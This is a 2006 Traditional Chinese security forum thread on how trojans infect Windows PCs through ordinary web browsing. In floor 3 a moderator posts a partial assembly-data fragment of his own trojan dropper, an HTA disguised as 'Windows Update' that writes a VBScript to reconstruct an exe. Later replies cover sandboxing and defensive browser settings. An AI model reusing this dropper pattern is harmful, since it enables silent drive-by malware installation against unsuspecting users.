廣告廣告
  加入我的最愛 設為首頁 風格修改
首頁 首尾
 手機版   訂閱   地圖  簡體 
您是第 2968 個閱讀者
 
發表文章 發表投票 回覆文章
  可列印版   加為IE收藏   收藏主題   上一主題 | 下一主題   
lens690 手機
個人頭像
個人文章 個人相簿 個人日記 個人地圖
初露鋒芒
級別: 初露鋒芒 該用戶目前不上站
推文 x1 鮮花 x51
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片
推文 x0
[問題討論] 問個問題,想知道這是啥原理?
最近在Google找資料,不小心點到簡體網站進去,然後,IE就鎖住無法使用...過一會,就覺得電腦怪怪的嚕~

當下,立刻重新開機進入安全模式察看,果然,發現了多達7個木馬進入電腦執行~

但,我的疑問是:要如何宰殺木馬,這個我很熟,但,木馬到底是怎進來的?這個真的無法防禦嗎?若不靠防毒程式、防火牆軟體等等,真的就沒有其他辦法了嗎?

因為,我察覺的檔案,都是一堆exe檔,以及一堆DLL檔案,這些檔案,並非我瀏覽網頁時,按執行或同意,而進來的~

而是單純只瀏覽就進來了,所以才有此問~

希望知道的大大能幫我解惑,感謝~



確保電腦安全,勿點選不明檔案或網址
獻花 x0 回到頂端 [樓 主] From:台灣中華電信 | Posted:2006-12-14 19:28 |
upside 手機 葫蘆墩家族
個人頭像
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎 社區建設獎 優秀管理員勳章
頭銜:反病毒 反詐騙 反虐犬   反病毒 反詐騙 反虐犬  
版主
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

大大沒做功課唷 此問題我也研究很久
按照原理我也能寫出一個小木馬 但純屬研究而已
http://bbs-mychat.com/read.php?fid=254&tid=587899


爸爸 你一路好走
獻花 x0 回到頂端 [1 樓] From:臺灣 | Posted:2006-12-14 19:51 |
lens690 手機
個人頭像
個人文章 個人相簿 個人日記 個人地圖
初露鋒芒
級別: 初露鋒芒 該用戶目前不上站
推文 x1 鮮花 x51
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

1.利用IE入侵,重點是IE沒上HotFix...

但是我的IE HotFix全上,那還會透過IE入侵是啥原因呢?

另外,有沒有辦法阻擋?



確保電腦安全,勿點選不明檔案或網址
獻花 x0 回到頂端 [2 樓] From:台灣中華電信 | Posted:2006-12-14 20:35 |
upside 手機 葫蘆墩家族
個人頭像
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎 社區建設獎 優秀管理員勳章
頭銜:反病毒 反詐騙 反虐犬   反病毒 反詐騙 反虐犬  
版主
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

一般來說 我只要在該網頁內 寫入一些指令語法就能 背景跳出視窗並自動下載檔案到你的電腦並且執行
這樣就達到入侵的動作了
我分享一段 之前寫的木馬程序的一段 應該還能看的懂吧
其他程序的執行法就無發佈出來了

按照現在的XP 系統安全性 幾乎無法防止 因為漏洞實在太多
甚至可以仿照正常下載程序來發佈木馬 防毒與防火牆 不可能阻擋這些正常程序
否則會無法上網或下載 除了已知木馬外約有70%-80% 幾乎無法阻擋
這些也是我頭痛的地方 明知道原理 可是找不出也寫不出好程式 表情

szHTAFileName   equ   "xxx.exe"                                                                                                                                                                  
szHTAVbsName   equ   "xxx.vbs"                                                                                                                                                                    
                                                                                                                                                                                         
szHTACode1     db     '<HTML>',13,10                                                                                                                                                                
          db     '<HEAD>',13,10                                                                                                                                                                
          db     '<TITLE>Windows Update</TITLE>',13,10                                                                                                                                                
          db     '<HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/>',13,10
          db     '<SCRIPT LANGUAGE="VBScript">',13,10                                                                                                                                                  
          db     'MyFile = "',szHTAVbsName,'"',13,10                                                                                                                                                  
          db     'Set FSO = CreateObject("Scripting.FileSystemObject")',13,10                                                                                                                                  
          db     'Set TSO = FSO.CreateTextFile(MyFile, True)',13,10                                                                                                                                        
          db     'TSO.write "dim filesys, filetxt, getname, path, textfile, i" & vbcrlf',13,10                                                                                                                      
          db     'TSO.write "textfile = ""',szHTAFileName,'""" & vbcrlf',13,10                                                                                                                                
          db     'TSO.write "Set filesys = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf',13,10                                                                                                                
          db     'TSO.write "Set filetxt = filesys.CreateTextFile(textfile, True)" & vbcrlf',13,10                                                                                                                    
          db     'TSO.write "getname = filesys.GetFileName(path)" & vbcrlf',13,10                                                                                                                              
          db     'TSO.write "dim a" & vbcrlf',13,10                                                                                                                                                  
          db     'TSO.write "a=Array(',0                                                                                                                                                          


[ 此文章被upside在2006-12-14 21:26重新編輯 ]


爸爸 你一路好走
獻花 x0 回到頂端 [3 樓] From:臺灣 | Posted:2006-12-14 21:15 |
lens690 手機
個人頭像
個人文章 個人相簿 個人日記 個人地圖
初露鋒芒
級別: 初露鋒芒 該用戶目前不上站
推文 x1 鮮花 x51
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

So...

恩~那...就遭了@@...



確保電腦安全,勿點選不明檔案或網址
獻花 x0 回到頂端 [4 樓] From:台灣中華電信 | Posted:2006-12-14 21:21 |
upside 手機 葫蘆墩家族
個人頭像
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎 社區建設獎 優秀管理員勳章
頭銜:反病毒 反詐騙 反虐犬   反病毒 反詐騙 反虐犬  
版主
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

下面是引用lens690於2006-12-14 21:21發表的 :
So...

恩~那...就遭了@@...
要防止 防毒.防木馬大廠都做不到了 我們這種小角色 當然也無法了
我們只能自力救濟 目前除了將 木馬防彈衣 再改版加強外
還在想設計一套 萬用木馬殺毒程序
其實研究木馬越多 發現其實原理都差不多 而且感染的地方也大同小異
只要定期執行一次 一些常見的木馬 都能刪除掉
其實一些掃除木馬軟體 也能做到 但是就某些木馬 暫時無法移除 必須等待該病毒碼更新後 才有可能
但是使用者卻不能等 常常在各大網站看到一些求助的帖子
都是一些新木馬.病毒 大廠的動作永遠是慢半拍 木馬.病毒的災情已經氾濫了 才遲遲更新病毒碼
甚至無解

但也看到一些朋友 提出不少的解決方案 有些有效有些無效
小弟的萬用木馬殺毒程序 也是參考其原理製作出來的
而且是開放的 有能力的朋友 可以隨時加入以便更新使用
在網路上有看到不少朋友有寫出類似的軟體 但是都是以程式來使用
無法自行加入 必須等待他更新


爸爸 你一路好走
獻花 x0 回到頂端 [5 樓] From:臺灣 | Posted:2006-12-14 21:48 |
upside 手機 葫蘆墩家族
個人頭像
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎 社區建設獎 優秀管理員勳章
頭銜:反病毒 反詐騙 反虐犬   反病毒 反詐騙 反虐犬  
版主
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

剛找到一篇舊文章 雖然再用此法可能已經行不通了
但是原理是一樣的 只要變一變 啥VISTA 防毒.防火牆 幾乎沒用了
http://bbs.mychat.to/read.php?fid=313&tid=211528


爸爸 你一路好走
獻花 x0 回到頂端 [6 樓] From:臺灣和信超媒體寬帶網 | Posted:2006-12-15 20:01 |
k8g 手機
個人頭像
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎
初露鋒芒
級別: 初露鋒芒 該用戶目前不上站
推文 x6 鮮花 x87
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

http://www.powershadow.c...o_faq.htm

如果用PowerShadow上網,那會不會安全點? 倒底有沒有用
我也很好奇,雖然它號稱百毒不侵? 表情有沒有可能在影子模式
底下的入侵,還原後還在?


[ 此文章被k8g在2006-12-16 11:41重新編輯 ]


阿彌陀佛
獻花 x0 回到頂端 [7 樓] From:未知地址 | Posted:2006-12-16 11:35 |
upside 手機 葫蘆墩家族
個人頭像
個人文章 個人相簿 個人日記 個人地圖
特殊貢獻獎 社區建設獎 優秀管理員勳章
頭銜:反病毒 反詐騙 反虐犬   反病毒 反詐騙 反虐犬  
版主
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

老話一句 有招就有破 有破大家用

雖然目前好像不會中毒 主要是它是一個虛擬的系統
讓木馬.病毒 僅在該系統中運作 而不會影響到正常系統
一旦關閉或重新開機 就完全消失了

如果新型的病毒會去判斷是否為虛擬系統還是正常系統
如果是虛擬的系統 會去走它的漏洞 進而影響到正常系統


爸爸 你一路好走
獻花 x0 回到頂端 [8 樓] From:臺灣 | Posted:2006-12-16 11:59 |
mylinux
個人頭像
個人文章 個人相簿 個人日記 個人地圖
小人物
級別: 小人物 該用戶目前不上站
推文 x0 鮮花 x13
分享: 轉寄此文章 Facebook Plurk Twitter 複製連結到剪貼簿 轉換為繁體 轉換為簡體 載入圖片

有段時間沒摸 Windows 了,但以下方法應該可將傷害降到最低:

1. 關閉 ActiveX 或是啟用時要通知。

2. 關閉 JavaScript,只開放一些知名的大站或熟悉的網站使用。

3. 使用可掃描 http port 的防毒軟體。


獻花 x0 回到頂端 [9 樓] From:歐洲 | Posted:2006-12-16 14:47 |

首頁  發表文章 發表投票 回覆文章
Powered by PHPWind v1.3.6
Copyright © 2003-04 PHPWind
Processed in 0.092632 second(s),query:16 Gzip disabled
本站由 瀛睿律師事務所 擔任常年法律顧問 | 免責聲明 | 本網站已依台灣網站內容分級規定處理 | 連絡我們 | 訪客留言